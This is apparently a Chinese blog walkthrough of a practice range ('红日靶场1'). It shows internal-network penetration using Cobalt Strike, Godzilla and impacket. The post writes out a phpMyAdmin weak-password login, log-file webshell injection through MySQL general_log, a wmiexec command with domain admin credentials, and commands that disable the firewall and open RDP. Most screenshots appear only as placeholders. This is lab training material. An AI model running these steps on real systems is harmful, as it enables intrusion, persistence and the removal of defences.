Skip to main content

红日靶场1-CS内网渗透

·136 words·1 min
IIIIIIIIIIII
Author
IIIIIIIIIIII
A little bit about you

红日靶场1-CS内网渗透
#

架构
#

IP:

攻击者为1网段

web服务器:1和52网段 其余成员皆只有1网段

nmap
123

使用工具
#

密码可能不同因为进去这些服务器就让你改密码你可以修改后改回来

使用工具:

CS4.7

哥斯拉

impacket-0.11.0套件

开始渗透
#

第一台主机
#

这里shell有两种还有一种是网站的还有一种是下面这种数据库

nmap
123

dir扫描发现开了phpadmin登录看看

nmap
123

弱口令进去

root:root

nmap
123

https://www.cnblogs.com/hellobao/articles/17253635.html

phpadmin提取方法
我选择下面这种
 MySQL 本身具备的特性
通过日志文件写 shell
SHOW VARIABLES LIKE 'general%';
set global general_log = "ON";
set global general_log_file='C:\\phpstudy\\www\\\\star.php'
因为他这是phpstudy所以写入日志到star.php

打开功能

nmap
123

命令执行无误

nmap
123

确实可以访问

nmap
123

写入到日志

nmap
123

哥斯拉连接

nmap
123

弹到我们的CS工具上

nmap
123

扫描端口网段

nmap
123

自动放入到密码和目标里面

nmap
123

找到CD主机

nmap
123

nmap
123

nmap
123

第二台主机
#

因为前面信息收集到都开放了445 我们尝试下永恒之蓝和wmi

nmap
123

不行啊两台都

nmap
123

使用套件里面的wmi成功拿下DC

python wmiexec.py Administrator:hongrisec@2025@192.168.52.138 -codec gbk

nmap
123

这里我试了反弹但是就是不行正向都不行

nmap
123

最后关闭防火墙可以连接

#关闭防火墙
netsh firewall set opmode disable   			#winsows server 2003 之前
netsh advfirewall set allprofiles state off 	#winsows server 2003 之后

#注册表开启3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

#添加防火墙规则
netsh advfirewall firewall add rule name="Open 3389" dir=in action=allow protocol=TCP localport=3389

nmap
123

第三台主机
#

在密码凭证那里

后面我们横向连接密码喷射上到第3台

nmap
123

三台全部拿下

nmap
123

Related

APP动态调试
·26 words·1 min
CS怎么上线LINUX
·18 words·1 min
红日靶场7-WP-MS17-010-WMI-laravel-docker-exp
APP-逆向修改
·38 words·1 min
APP-安卓9模拟器抓包设置-绕过双向验证
·63 words·1 min